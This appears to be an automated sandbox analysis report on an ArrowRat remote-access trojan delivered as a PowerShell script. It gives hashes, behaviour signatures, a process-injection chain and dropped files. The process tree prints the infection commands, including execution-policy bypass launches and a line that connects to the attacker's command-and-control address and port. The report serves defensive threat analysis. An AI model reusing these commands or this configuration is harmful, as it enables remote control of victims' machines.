arrowrat | 5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2023 01:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
Size

457KB
MD5

5ff1aded34d5d6f0635f6f9861436886
SHA1

d798ff38d279754353ee88ff35bf46a87dc75484
SHA256

abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd
SHA512

b3d6b951c3130e8a834744cbebc78208b9e1393517ca40e4e3a5bdf391cb1c05c4a23ee88aaac61b1be5a163811069d97ecfdf372457607cc3716ea11a6d8402
SSDEEP

6144:6VDFV/A8nNKmbcRTUufYbE6N4tDeaBfLo1sHsl9yS/M0HixBNqrpB92bMDsA4nx2:snND98MDL

Score

10^/10

arrowrat client rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

185.252.178.121:1337

Mutex

qCDAaGyIF

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1732 set thread context of 3244	1732	powershell.exe	107
PID 3244 set thread context of 1620	3244	aspnet_compiler.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{B05CD583-21C4-4B88-AD2A-A7B36E5F950D}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3780	powershell.exe
3780	powershell.exe
4584	powershell.exe
4584	powershell.exe
1732	powershell.exe
1732	powershell.exe
3244	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeIncreaseQuotaPrivilege	4584	powershell.exe
Token: SeSecurityPrivilege	4584	powershell.exe
Token: SeTakeOwnershipPrivilege	4584	powershell.exe
Token: SeLoadDriverPrivilege	4584	powershell.exe
Token: SeSystemProfilePrivilege	4584	powershell.exe
Token: SeSystemtimePrivilege	4584	powershell.exe
Token: SeProfSingleProcessPrivilege	4584	powershell.exe
Token: SeIncBasePriorityPrivilege	4584	powershell.exe
Token: SeCreatePagefilePrivilege	4584	powershell.exe
Token: SeBackupPrivilege	4584	powershell.exe
Token: SeRestorePrivilege	4584	powershell.exe
Token: SeShutdownPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeSystemEnvironmentPrivilege	4584	powershell.exe
Token: SeRemoteShutdownPrivilege	4584	powershell.exe
Token: SeUndockPrivilege	4584	powershell.exe
Token: SeManageVolumePrivilege	4584	powershell.exe
Token: 33	4584	powershell.exe
Token: 34	4584	powershell.exe
Token: 35	4584	powershell.exe
Token: 36	4584	powershell.exe
Token: SeIncreaseQuotaPrivilege	4584	powershell.exe
Token: SeSecurityPrivilege	4584	powershell.exe
Token: SeTakeOwnershipPrivilege	4584	powershell.exe
Token: SeLoadDriverPrivilege	4584	powershell.exe
Token: SeSystemProfilePrivilege	4584	powershell.exe
Token: SeSystemtimePrivilege	4584	powershell.exe
Token: SeProfSingleProcessPrivilege	4584	powershell.exe
Token: SeIncBasePriorityPrivilege	4584	powershell.exe
Token: SeCreatePagefilePrivilege	4584	powershell.exe
Token: SeBackupPrivilege	4584	powershell.exe
Token: SeRestorePrivilege	4584	powershell.exe
Token: SeShutdownPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeSystemEnvironmentPrivilege	4584	powershell.exe
Token: SeRemoteShutdownPrivilege	4584	powershell.exe
Token: SeUndockPrivilege	4584	powershell.exe
Token: SeManageVolumePrivilege	4584	powershell.exe
Token: 33	4584	powershell.exe
Token: 34	4584	powershell.exe
Token: 35	4584	powershell.exe
Token: 36	4584	powershell.exe
Token: SeIncreaseQuotaPrivilege	4584	powershell.exe
Token: SeSecurityPrivilege	4584	powershell.exe
Token: SeTakeOwnershipPrivilege	4584	powershell.exe
Token: SeLoadDriverPrivilege	4584	powershell.exe
Token: SeSystemProfilePrivilege	4584	powershell.exe
Token: SeSystemtimePrivilege	4584	powershell.exe
Token: SeProfSingleProcessPrivilege	4584	powershell.exe
Token: SeIncBasePriorityPrivilege	4584	powershell.exe
Token: SeCreatePagefilePrivilege	4584	powershell.exe
Token: SeBackupPrivilege	4584	powershell.exe
Token: SeRestorePrivilege	4584	powershell.exe
Token: SeShutdownPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeSystemEnvironmentPrivilege	4584	powershell.exe
Token: SeRemoteShutdownPrivilege	4584	powershell.exe
Token: SeUndockPrivilege	4584	powershell.exe
Token: SeManageVolumePrivilege	4584	powershell.exe
Token: 33	4584	powershell.exe
Token: 34	4584	powershell.exe
Token: 35	4584	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3780 wrote to memory of 100	3780	powershell.exe	88
PID 3780 wrote to memory of 100	3780	powershell.exe	88
PID 100 wrote to memory of 3832	100	WScript.exe	90
PID 100 wrote to memory of 3832	100	WScript.exe	90
PID 3832 wrote to memory of 4584	3832	cmd.exe	93
PID 3832 wrote to memory of 4584	3832	cmd.exe	93
PID 3848 wrote to memory of 4568	3848	WScript.exe	104
PID 3848 wrote to memory of 4568	3848	WScript.exe	104
PID 4568 wrote to memory of 1732	4568	cmd.exe	106
PID 4568 wrote to memory of 1732	4568	cmd.exe	106
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 1732 wrote to memory of 3244	1732	powershell.exe	107
PID 3244 wrote to memory of 3184	3244	aspnet_compiler.exe	108
PID 3244 wrote to memory of 3184	3244	aspnet_compiler.exe	108
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109
PID 3244 wrote to memory of 1620	3244	aspnet_compiler.exe	109

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4584

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3244
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        Modifies registry class
        
        PID:3184
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF
        5⤵
        
        PID:1620

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Unlimited\ISO\Binnot.bat

Filesize
96B

MD5
f1d747a7825a5db756d428a5254d244e

SHA1
7db56fe57492bd856c787cd2a836eff4f2ce5e01

SHA256
5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf

SHA512
4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.ps1

Filesize
781B

MD5
58ef18971b1520648e0c6d67036251ff

SHA1
68bd1ee657ff233f6a1ee453914aaecdeb845284

SHA256
226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3

SHA512
9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.vbs

Filesize
204B

MD5
8444901b66d6f83f3a684f1b44646868

SHA1
69c9c40aef3734959b4ce5f07005bf13c07646f9

SHA256
cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da

SHA512
7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.bat

Filesize
99B

MD5
eff64d56c40c54a1f9891d7a6ad54899

SHA1
dbaf9a4aeb8484690d6118155d59158598f0799a

SHA256
c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2

SHA512
c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.ps1

Filesize
455KB

MD5
e1bb0ce912e111d3b891de922e21a739

SHA1
8ae8856cb82f3340b2b2b1a06b3123b549005549

SHA256
5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc

SHA512
bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.vbs

Filesize
207B

MD5
c281573a4f6f6ac5b06f2e9436400093

SHA1
c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8

SHA256
3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7

SHA512
76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
27fdb1beb89b56345e585d480be3026b

SHA1
2626e41ca27668518d01c04e1579f77027ff31a1

SHA256
ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2

SHA512
bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2cacea4e19ddf5755e70346cc1cbe27b

SHA1
d4f7c2950f951857da18cfec490370152983e121

SHA256
5488c6f47e2e55addf07b920f0ce43ed970515193c4cb1ffb845a9b441bcd9ad

SHA512
445497cefd12a10e19272b51028a6b19d039b578a2e4d1f4c7f4c4bed447c55b1cd23453e9bed9307aaeb7b57ea8c721d1884eaaafa422df4607cfe3a75f54f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl0dbiph.qjs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1620-194-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1732-188-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

Filesize
64KB

Download
memory/1732-186-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

Filesize
64KB

Download
memory/1732-187-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

Filesize
64KB

Download
memory/3244-190-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3244-192-0x0000000005460000-0x0000000005A04000-memory.dmp

Filesize
5.6MB

Download
memory/3244-193-0x0000000004F50000-0x0000000004FEC000-memory.dmp

Filesize
624KB

Download
memory/3780-144-0x000001FC49500000-0x000001FC49510000-memory.dmp

Filesize
64KB

Download
memory/3780-143-0x000001FC49500000-0x000001FC49510000-memory.dmp

Filesize
64KB

Download
memory/3780-133-0x000001FC31060000-0x000001FC31082000-memory.dmp

Filesize
136KB

Download
memory/4584-172-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

Filesize
64KB

Download
memory/4584-171-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

Filesize
64KB

Download
memory/4584-159-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

Filesize
64KB

Download
memory/4584-158-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

Filesize
64KB

Download